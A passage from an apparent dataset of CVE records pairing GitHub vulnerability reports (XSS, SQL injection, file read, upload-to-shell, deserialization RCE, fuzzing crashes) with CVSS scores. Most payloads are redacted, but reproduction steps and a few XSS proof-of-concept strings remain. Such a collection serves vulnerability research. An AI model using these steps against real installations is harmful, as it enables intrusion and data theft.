        "description": "Several bugs found by fuzzing. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2SVG APITAG NUMBERTAG NULL pointer dereference in htmlescape PATHTAG POC: URLTAG ASAN says: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-21827",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/183",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/183",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-01-13T02:49:42Z",
        "description": "Heap over flow. I found a bug in dwg2dxf. POC: URLTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-21830",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/188",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/188",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-01-15T04:37:59Z",
        "description": "Several bugs found by fuzzing. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp APITAG NUMBERTAG NULL pointer dereference in read NUMBERTAG compressed_section PATHTAG POC: URLTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21854",
        "Issue_Url_old": "https://github.com/TideSec/WDScanner/issues/41",
        "Issue_Url_new": "https://github.com/tidesec/wdscanner/issues/41",
        "Repo_new": "tidesec/wdscanner",
        "Issue_Created_At": "2020-01-08T06:10:40Z",
        "description": "XSS vulnerability in system management page. Hello, I found XSS vulnerability in the system management page\u3002 APITAG This is the payload When I tested: FILETAG Param:c=new&m=set APITAG APITAG group NUMBERTAG mail= APITAG APITAG NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-21929",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/8",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/8",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2020-01-14T08:25:16Z",
        "description": "Storage XSS vulnerabilities exist in \"web_copyright \" field in eyoucms NUMBERTAG Storage XSS refers to an application that directly stores malicious code submitted by the attacker to the background. When the display data page is accessed, the malicious script executes malicious code in the browser due to html injection and the attacker controls the browser. After the administrator logged in, open the following one page url: FILETAG poc: in web_copyright FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-21930",
        "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/9",
        "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/9",
        "Repo_new": "weng-xianhu/eyoucms",
        "Issue_Created_At": "2020-01-14T08:33:10Z",
        "description": "Storage XSS vulnerabilities exist in \"web_attr NUMBERTAG field in eyoucms NUMBERTAG Storage XSS refers to an application that directly stores malicious code submitted by the attacker to the background. When the display data page is accessed, the malicious script executes malicious code in the browser due to html injection and the attacker controls the browser. After the administrator logged in, open the following one page url: FILETAG poc: in web_attr NUMBERTAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-21967",
        "Issue_Url_old": "https://github.com/PrestaShop/PrestaShop/issues/20306",
        "Issue_Url_new": "https://github.com/prestashop/prestashop/issues/20306",
        "Repo_new": "prestashop/prestashop",
        "Issue_Created_At": "2020-07-23T17:29:20Z",
        "description": "Cross Site Scripting Issue in APITAG Using File Upload Functionality. APITAG An issue is discovered in APITAG version NUMBERTAG under the Catelog feature when using the file upload functionality for uploading the Files for various products. This issue exists because it fails to implement file content checks and improperly handles the output, resulting in cross site scripting attack that leads to cookie stealing or malicious actions. Steps to Reproduce NUMBERTAG Go to Catelog feature NUMBERTAG Click on File component and add the details accordingly NUMBERTAG Create a file with .html extension and enter the payload APITAG alert('XSS!!'); APITAG within it. APITAG its, APITAG NUMBERTAG Upload the file NUMBERTAG Login as customer and click on the file uploaded for the particular product NUMBERTAG You can see the XSS payload gets executed. CVSS Score: PATHTAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-22083",
        "Issue_Url_old": "https://github.com/jsonpickle/jsonpickle/issues/332",
        "Issue_Url_new": "https://github.com/jsonpickle/jsonpickle/issues/332",
        "Repo_new": "jsonpickle/jsonpickle",
        "Issue_Created_At": "2020-12-17T14:50:46Z",
        "description": "Jsonpickle APITAG function unsafely form objects that can lead to Remote code execution. APITAG NUMBERTAG allows remote code execution during deserialization of a malicious payload through the APITAG function. Attack Vectors : The jsonpickle can be exploited by deserialization of malicious jsonpickled payload with default APITAG function of its object. The payload can be easily generated by this payload generator: URLTAG and passed to decode function like object = APITAG it will certainly execute command.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22120",
        "Issue_Url_old": "https://github.com/peacexie/imcat/issues/3",
        "Issue_Url_new": "https://github.com/peacexie/imcat/issues/3",
        "Repo_new": "peacexie/imcat",
        "Issue_Created_At": "2020-02-10T04:28:16Z",
        "description": "You code has a Code Execution Vulnerability in the backstage . APITAG the backstage FILETAG NUMBERTAG find \u201cDIY\u914d\u7f6e\u201d URLTAG NUMBERTAG Click on the \u201c\u4fee\u6539\u201d FILETAG NUMBERTAG Modify the content payload\uff1a APITAG And save it FILETAG NUMBERTAG Access to this file and it has a Code Execution FILETAG fix: APITAG best removal of this function",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22124",
        "Issue_Url_old": "https://github.com/876054426/vul/issues/1",
        "Issue_Url_new": "https://github.com/876054426/vul/issues/1",
        "Repo_new": "876054426/vul",
        "Issue_Created_At": "2020-02-25T07:56:40Z",
        "description": "joyplus cms NUMBERTAG has Any file to read vulnerability. Title: joyplus cms NUMBERTAG Any file to read vulnerability Date NUMBERTAG Exploit Author: Zeo Vendor Homepage: URLTAG and FILETAG Software Link: URLTAG Version NUMBERTAG Tested on Windows NUMBERTAG joyplus cms NUMBERTAG has a vulnerability that can Any file to read that would allow an attacker to Sensitive information website and mysql or ftp password Proof NUMBERTAG Normal installation site and login URLTAG NUMBERTAG Access to trigger the vulnerability site You can switch to any directory payload FILETAG You can switch to any directory PATHTAG FILETAG NUMBERTAG read the PATHTAG code Let the cat out of the mysql password You can switch to any directory\uff0cjust change the PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22148",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1157",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1157",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2020-02-12T02:40:57Z",
        "description": "Stored Cross Site Scripting in APITAG Hi team, I just found a stored XSS in APITAG . Exploit Request : CODETAG APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22150",
        "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1158",
        "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1158",
        "Repo_new": "piwigo/piwigo",
        "Issue_Created_At": "2020-02-12T03:32:27Z",
        "description": "XSS in APITAG Hi team! I found a XSS in XSS in APITAG Exploit Request: CODETAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22198",
        "Issue_Url_old": "https://github.com/blindkey/DedeCMSv5/issues/1",
        "Issue_Url_new": "https://github.com/blindkey/dedecmsv5/issues/1",
        "Repo_new": "blindkey/dedecmsv5",
        "Issue_Created_At": "2020-02-17T09:01:25Z",
        "description": "ajax_membergroup.php mdescription SQL inject. FILETAG FILETAG line NUMBERTAG indicate that we can control mdescription variables . because there is no fillter fro var mdescription. so we can acheive a sql injection in that . like poc: GET PATHTAG description NUMBERTAG D@ APITAG , description APITAG APITAG APITAG Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG Trident NUMBERTAG SLCC2; .NET CLR NUMBERTAG NET CLR NUMBERTAG NET CLR NUMBERTAG NET NUMBERTAG C; .NET NUMBERTAG E; r NUMBERTAG like APITAG Type NUMBERTAG d NUMBERTAG a NUMBERTAG d NUMBERTAG a",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22199",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/1",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/1",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-17T11:17:50Z",
        "description": "phpcms NUMBERTAG sp6 FILETAG SQL inject. today , i collect some traffic from internet and i found something like this. CODETAG so many scanner try to do some thiing . so i do some reserach .. FILETAG it's APITAG is no filter in FILETAG . the digg_mod trans to mod_id and get excute.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22200",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/2",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/2",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-17T12:06:58Z",
        "description": "PHPCMS NUMBERTAG public_get_suggest_keyword any file read. some think like this in honeypot get my attension . APITAG and i did some google ,found that in PHPCMS NUMBERTAG the file FILETAG q parame pass to file_get_content.. i do some more google ,and found that it still APITAG below. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22201",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/4",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/4",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T03:32:57Z",
        "description": "phpcms NUMBERTAG FILETAG pagesize parameters RCE. phpcms NUMBERTAG in FILETAG FILETAG there is no filter before or after the pagesize value pass to $urlrules FILETAG and after template render ,we come to a function which will evaluate the data like below: FILETAG so the evalutate will trigger a arbitry command injection. poc like this: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22203",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/6",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/6",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T04:34:34Z",
        "description": "phpcms NUMBERTAG FILETAG genre parameter sql inject. FILETAG FILETAG genre parameters pass to sql command without filter poc: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22204",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/7",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/7",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T04:53:25Z",
        "description": "ecshop NUMBERTAG FILETAG goods_number sql inject. ecshop NUMBERTAG FILETAG FILETAG flow_update_cart($_POST FILETAG use to make value as int ,but forget to do the same with key vars .. so leads to sql inject . hackers can do this like : CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22205",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/8",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/8",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T05:24:17Z",
        "description": "ecshop NUMBERTAG FILETAG id APITAG ecshop NUMBERTAG FILETAG FILETAG at line NUMBERTAG id was passe to execute without filter and leads to sql inject",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22206",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/9",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/9",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T05:36:12Z",
        "description": "ecshop NUMBERTAG FILETAG aid SQL inject. FILETAG FILETAG auid parameters pass to sqladd without filter leads to sql inejct .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22208",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/10",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/10",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T12:35:38Z",
        "description": "NUMBERTAG cms NUMBERTAG FILETAG x APITAG . PATHTAG FILETAG $alphabet=trim($_GET['x']); and then $alphabet has been pass to sql without filter so leads to sql inject poc like : ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22209",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/12",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/12",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T12:44:54Z",
        "description": "NUMBERTAG cms NUMBERTAG ajax_common query SQL inject . FILETAG FILETAG $_GET['query'] pass to $gbk_query and then $gbk_query get iconv so use some special word to do something with iconv ,like wide charactars( such as NUMBERTAG c NUMBERTAG chinese word or some thing . and then get into sql and finally leads to sql inject . poc: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22210",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/11",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/11",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T12:38:29Z",
        "description": "NUMBERTAG cms NUMBERTAG FILETAG x SQL inject . PATHTAG FILETAG exactly the same as what happend to FILETAG x pass to alphabet and get in within a sql expression without filter ,so leads to sql inject poc the same : ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22211",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/13",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/13",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T12:49:10Z",
        "description": "NUMBERTAG cms FILETAG key SQL inject . quite like the one URLTAG look at the file with the act = \"key\" below FILETAG $keys just get iconv and then pass to the sql ,and finally leads to sql inject .. poc: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22212",
        "Issue_Url_old": "https://github.com/blindkey/cve_like/issues/14",
        "Issue_Url_new": "https://github.com/blindkey/cve_like/issues/14",
        "Repo_new": "blindkey/cve_like",
        "Issue_Created_At": "2020-02-18T12:57:08Z",
        "description": "NUMBERTAG cms NUMBERTAG FILETAG id SQL inject . in file FILETAG FILETAG $smarty APITAG id was direcly pass to sql expression and finally leads to sql inject .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22251",
        "Issue_Url_old": "https://github.com/phpList/phplist3/issues/660",
        "Issue_Url_new": "https://github.com/phplist/phplist3/issues/660",
        "Repo_new": "phplist/phplist3",
        "Issue_Created_At": "2020-05-18T16:59:44Z",
        "description": "XSS vulnerability in version NUMBERTAG and lower. XSS vulnerability exists in admin page while adding a new administrator in the Login name field. Steps to Reproduce NUMBERTAG Login as administrator NUMBERTAG Navigate to the APITAG administrators\" under config NUMBERTAG Click on APITAG new admin NUMBERTAG Inject the payload in the Login name field Payload: APITAG alert NUMBERTAG APITAG NUMBERTAG Enter any other required details and click on APITAG changes\" POC: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2020-22312",
        "Issue_Url_old": "https://github.com/wlx65003/HZNUOJ/issues/17",
        "Issue_Url_new": "https://github.com/lixin-wei/hznuoj/issues/17",
        "Repo_new": "lixin-wei/hznuoj",
        "Issue_Created_At": "2020-02-25T08:32:50Z",
        "description": "Strict SQL filtering leads to xss injection vulnerability. description The code problem occurred in APITAG . The APITAG in the output form was obtained from the database. There was no filtering of angle brackets \u201c APITAG \u201d during registration, which caused the reorganization here. xss injection FILETAG Attack process CODETAG FILETAG Then visit APITAG , set the APITAG to soft NUMBERTAG and click submit FILETAG the attack works FILETAG poc APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22330",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/850",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/850",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2019-12-18T06:59:25Z",
        "description": "Possible Cross site scripting (XSS) . SCOPE: Package: Subrion CMS Version NUMBERTAG ISSUE: XSS Vulnerability Description: The software does not neutralize or incorrectly neutralizes user controllable input before it is placed in output that is used as a web page that is served to other users. As a result, an attacker can inject and execute arbitrary HTML and script code in user's browser in context of a vulnerable website. Vulnerability Classification: CWE NUMBERTAG APITAG NUMBERTAG CVSS NUMBERTAG PATHTAG Steps To Reproduce: Login Click on contents APITAG APITAG page APITAG Fill the details APITAG In title give the payload APITAG APITAG Now click on blocks while adding a new block XSS is being triggered. APITAG Reference: CVETAG Mitigations: Perform sanitation of input data before inserting it into the page content. Escaping user input. Validating user input.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22352",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1423",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1423",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2020-03-01T19:19:26Z",
        "description": "APITAG NULL pointer dereference in APITAG in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Thanks dr3dd",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-22392",
        "Issue_Url_old": "https://github.com/intelliants/subrion/issues/868",
        "Issue_Url_new": "https://github.com/intelliants/subrion/issues/868",
        "Repo_new": "intelliants/subrion",
        "Issue_Created_At": "2020-03-05T02:55:23Z",
        "description": "Blog Stored XSS Vulnerability. Hello,I found a stored xss bug when add blog. At first add a blog and upload image ,then edit APITAG file \u201dx\u201d onerror=\u201dalert(/xss/). Browse blog trigger XSS. Suggestion call APITAG to image FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-22394",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/42",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/42",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2020-03-04T11:56:13Z",
        "description": "XSS vulnerability exists in member submission function. \u4f1a\u5458\u6295\u7a3f\u529f\u80fd\uff0c\u4f7f\u7528\u5982\u4e0bpayload\u5373\u53ef\u9020\u6210xss APITAG APITAG APITAG FILETAG \u6211\u5728\u5b98\u65b9\u6f14\u793a\u7ad9\u6295\u7a3f\u4e86\u4e00\u4e2a\u6587\u7ae0\uff0cid NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22481",
        "Issue_Url_old": "https://github.com/hacklcx/HFish/issues/69",
        "Issue_Url_new": "https://github.com/hacklcx/hfish/issues/69",
        "Repo_new": "hacklcx/hfish",
        "Issue_Created_At": "2020-03-15T05:35:23Z",
        "description": "XSS exists in the information,can get cookie. In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks. FILETAG Use the following code to get a cookie. ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22535",
        "Issue_Url_old": "https://github.com/Pbootcms/Pbootcms/issues/5",
        "Issue_Url_new": "https://github.com/pbootcms/pbootcms/issues/5",
        "Repo_new": "pbootcms/pbootcms",
        "Issue_Created_At": "2020-03-20T12:37:57Z",
        "description": "Pbootcms NUMBERTAG has a management background arbitrary file download vulnerability. The vulnerability lies in the update function of the FILETAG file. In this function, the 'list' variable is spliced into the path without filtering, so any file can be copied under the '/ backup / upgrade /' path, and then the file can be downloaded by directly accessing the file. APITAG in to the / FILETAG page. FILETAG APITAG the '/ pbootcms / Admin. PHP? P = / upgrade / update' to request that the contents of the list point to the file to be downloaded FILETAG APITAG visit '\\ pbootcms \\ static \\ backup \\ extensions \\ APITAG \\ conf \\ nginx. Conf' to download to the file FILETAG code FILETAG The filtering of 'list' is not strict.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-22643",
        "Issue_Url_old": "https://github.com/liufee/cms/issues/51",
        "Issue_Url_new": "https://github.com/liufee/cms/issues/51",
        "Repo_new": "liufee/cms",
        "Issue_Created_At": "2020-03-27T10:09:42Z",
        "description": "\u540e\u53f0\u5934\u50cf\u7ba1\u7406\u6a21\u5757\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20getshell NUMBERTAG The administrator will use the APITAG function in the PATHTAG file to modify the avatar. This function will call Util's APITAG function FILETAG NUMBERTAG We continue to use the APITAG function to find that the function directly calls the upload function without filtering the file name. FILETAG NUMBERTAG We followed up the APITAG function and found that the temporary file was directly moved to an undetected file name. FILETAG NUMBERTAG ulnerability verification FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-22650",
        "Issue_Url_old": "https://github.com/jpalanco/alienvault-ossim/issues/4",
        "Issue_Url_new": "https://github.com/jpalanco/alienvault-ossim/issues/4",
        "Repo_new": "jpalanco/alienvault-ossim",
        "Issue_Created_At": "2020-03-27T02:27:37Z",
        "description": "A memory leak Vulnerability. I discovered the memory leak vulnerability on NUMBERTAG th lines in file sim organizer.c. The memory allocated the function APITAG is not freed\uff0cbefore the function sim_event_unref (event) is called. As well as event >backlog_id is the member of the structure event. So when lots of alarm events occurs, increasing memory usage can cause system crash.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-22673",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1342",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1342",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-13T04:06:43Z",
        "description": "There are memory leaks in the APITAG function of APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! \u221a] I looked for a similar issue and couldn't find any. [ \u221a] I tried with the latest version of GPAC. Installers available at URLTAG [ \u221a] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG A crafted input will lead to crash in box_code_drm.c at gpac NUMBERTAG Triggered by APITAG diso POC out /dev/null Poc NUMBERTAG memleak senc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-22674",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1346",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1346",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2019-11-13T07:15:54Z",
